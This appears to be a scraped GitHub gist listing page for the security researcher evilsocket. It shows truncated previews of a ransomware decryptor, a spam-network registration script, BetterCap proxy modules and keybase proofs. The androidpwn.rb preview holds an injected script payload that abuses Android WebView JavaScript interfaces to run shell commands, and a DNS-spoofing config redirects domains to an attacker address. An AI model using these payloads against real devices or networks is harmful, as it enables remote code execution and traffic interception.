I hereby claim:
- I am evilsocket on github.
- I am evilsocket (https://keybase.io/evilsocket) on keybase.
- I have a public key ASDQOex7WfTVV8cumbapyzHyv-NXXay_D0-RfJwOH8xKrQo
To claim this, I am signing this object:
Simone Margaritelli evilsocket
evilsocket
/ magniber_decryptor.cpp
Created
October 19, 2017 14:09
Decryptor for Magniber ransomware ( https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/ )
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * This tool will decrypt files encrypted by the Magniber ransomware with | |
| * AES128 ( CBC mode ) algorithm. | |
| * | |
| * RE and report by MalwareBytes ( @hasherezade ) | |
| * | |
| * https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/ | |
| * | |
| * Decryptor written by Simone 'evilsocket' Margaritelli | |
| * |
evilsocket
/ spam_yuanopen.go
Last active
March 21, 2021 13:56
registers random users to a spam&scam network that's targeting EU
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "encoding/json" | |
| "fmt" | |
| "io/ioutil" | |
| "math/rand" | |
| "net/http" | |
| "net/url" | |
| "strings" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class Example < BetterCap::Proxy::TCP::Module | |
| meta( | |
| 'Name' => 'Example', | |
| 'Description' => 'Example TCP proxy module.', | |
| 'Version' => '1.0.0', | |
| 'Author' => "Simone 'evilsocket' Margaritelli", | |
| 'License' => 'GPL3' | |
| ) | |
| # Received when the victim is sending data to the upstream server. |
evilsocket
/ keybase.md
Created
November 14, 2019 21:29
evilsocket
/ piping.sh
Created
June 8, 2015 17:17
Periodically scan your network searching for your Raspberry Pi board and update your /etc/hosts file with its ip address.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Periodically scan your network searching for your | |
| # Raspberry Pi board and update your /etc/hosts file | |
| # with its ip address. | |
| # | |
| # Copyleft by Simone 'evilsocket' Margaritelli | |
| # http://www.evilsocket.net | |
| # evilsocket at gmail dot com | |
| # |
evilsocket
/ androidpwn.rb
Created
January 19, 2016 06:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class AndroidPwn < BetterCap::Proxy::Module | |
| @@command = nil | |
| @@payload = "<script>\n" + | |
| "var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" + | |
| "for(i in top) {\n" + | |
| " try {\n" + | |
| " top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" + | |
| " break;\n" + | |
| " }\n" + | |
| "catch(e) {}\n" + |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Empty lines or lines starting with # will be ignored. | |
| # redirect *.google.com to the attacker ip address | |
| local .*google\.com | |
| # redirect *.microsoft.com to 10.10.10.10 | |
| 10.10.10.10 .*microsoft\.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class HackTitle < BetterCap::Proxy::HTTP::Module | |
| meta( | |
| 'Name' => 'HackTitle', | |
| 'Description' => 'Adds a "!!! HACKED !!!" string to every webpage title.', | |
| 'Version' => '1.0.0', | |
| 'Author' => "Simone 'evilsocket' Margaritelli", | |
| 'License' => 'GPL3' | |
| ) | |
| # called before the request is performed |
evilsocket
/ jsinterface.java
Created
January 19, 2016 06:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public class WebViewGUI extends Activity { | |
| WebView mWebView; | |
| public void onCreate(Bundle savedInstanceState) { | |
| super.onCreate(savedInstanceState); | |
| mWebView=new WebView(this); | |
| mWebView.getSettings().setJavaScriptEnabled(true); | |
| mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface"); | |
| mWebView.loadUrl("file:///android_asset/www/index.html"); | |
| setContentView(mWebView); | |
| } |
evilsocket
/ keybase.md
Created
November 30, 2017 11:19
I hereby claim:
- I am evilsocket on github.
- I am evilsocket (https://keybase.io/evilsocket) on keybase.
- I have a public key whose fingerprint is 7F1A D5FA 2A51 87DF DD53 DDA9 1564 D7F3 0393 A456
To claim this, I am signing this object: